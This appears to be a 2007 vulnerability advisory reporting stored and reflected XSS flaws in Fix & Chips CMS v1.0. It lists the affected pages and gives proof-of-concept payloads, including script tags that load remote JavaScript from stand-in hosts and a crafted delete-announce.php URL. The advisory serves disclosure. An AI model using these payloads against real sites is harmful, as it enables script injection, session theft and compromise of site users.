Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15617
HistoryJan 07, 2007 - 12:00 a.m.

Fix & Chips CMS v1.0

2007-01-0700:00:00
vulners.com
11

Fix & Chips CMS v1.0

http://software.fixnchipsit.com/

Vulnerable files:

staff.php
delete-announce.php
new-customer.php
search.php
client-results.php

staff.php XSS
User input in the Announcement box isn't properly sanatized before being generated.

A few PoC's that work:

<SCRIPT SRC=http://somesite.com/xss.js&gt;&lt;/SCRIPT&gt;

<IMG SRC=javascript:alert(&quot;XSS&quot;)>


delete-announce.php XSS

http://www.example.com/delete-announce.php?id=&lt;SCRIPT&#37;20SRC=example.com/xss.js&gt;&lt;/SCRIPT&gt;


new-customer.php

User input in all of the input boxes when adding a new customer isnt sanatized. For a PoC in any input box when adding a new

client put:

<SCRIPT SRC=http://example.com/xss.js&gt;&lt;/SCRIPT&gt;

Because of the above, all malicious user input that is listed on the pages search.php and client-results.php will execute as well.


  • Luny